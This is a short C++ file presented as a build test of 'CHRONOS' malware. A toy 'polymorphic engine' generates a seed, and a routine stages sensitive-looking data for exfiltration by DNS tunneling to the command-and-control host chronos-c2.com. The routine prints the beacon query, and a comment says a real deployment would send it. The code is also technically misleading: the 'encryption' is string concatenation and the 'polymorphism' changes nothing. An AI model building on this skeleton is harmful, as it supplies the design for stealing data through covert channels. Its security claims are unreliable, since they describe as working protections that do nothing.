#include <iostream>
#include <string>
#include <vector>
#include <cstdlib>
#include <ctime>
#include <sstream>
#include <iomanip>

// --- RE-USING STRUCTURES FROM PHASE 2 ---
enum RegisterMap { MAP_A = 0, MAP_B = 1, MAP_C = 2, MAP_D = 3 };

// Global variable to hold the dynamic seed generated by the engine
long long DynamicEncryptionSeed = 0; 

/**
 * @brief Polymorphic Engine Core (Modified to store the result globally)
 */
void ExecutePolymorphicPayload(int input_value) {
    srand(time(NULL) + input_value); 
    int map_a, map_b, map_c, map_d;

    map_a = rand() % 4;
    map_b = rand() % 4;
    map_c = rand() % 4;
    map_d = rand() % 4;

    // CORE CALCULATION (This result becomes our DES)
    int calculated_result = input_value * (map_a + map_b); 
    DynamicEncryptionSeed = calculated_result; // Store the unique seed

    std::cout << "[CHRONOS Engine] --- Mutation Cycle Complete ---" << std::endl;
    std::cout << "-> Dynamic Encryption Seed (DES): " << DynamicEncryptionSeed << std::endl;
}


/**
 * @brief Data Collection and Exfiltration Routine
 */
void InitiateExfiltrationCycle() {
    std::cout << "\n[CHRONOS Execution] Initiating Data Collection..." << std::endl;
    
    // --- Step 1: Collect Sample Data (Simulated) ---
    std::string collected_data = "Sensitive document content found. User ID: 8823.";

    std::cout << "[CHRONOS Execution] Collected Payload Size: " << collected_data.length() << " bytes." << std::endl;

    // --- Step 2: Encryption using the Dynamic Seed (DES) ---
    std::string encrypted_payload = "[ENC:" + std::to_string(DynamicEncryptionSeed) + "]::" + collected_data;
    std::cout << "[CHRONOS Execution] Data Encrypted. Payload: " << encrypted_payload << std::endl;

    // --- Step 3: DNS Tunneling Preparation (The Whisper) ---
    std::string subdomain = encrypted_payload.substr(0, 50); // Take a manageable chunk
    std::cout << "[CHRONOS Execution] Preparing DNS Beacon..." << std::endl;
    std::cout << "-> Sending Query for: " << subdomain << ".chronos-c2.com" << std::endl;

    // In a real deployment, this triggers the actual socket call to the DNS server.
}


int main() {
    std::cout << "========================================" << std::endl;
    std::cout << "      CHRONOS MALWARE: FULL BUILD TEST" << std::endl;
    std::cout << "========================================" << std::endl;

    // 1. Run the Polymorphic Engine first to generate the key
    ExecutePolymorphicPayload(100); // Test run 1
    
    // 2. Run the Exfiltration Cycle using the generated key
    InitiateExfiltrationCycle();

    std::cout << "\n--- CHRONOS TEST COMPLETE ---" << std::endl;
    return 0;
}
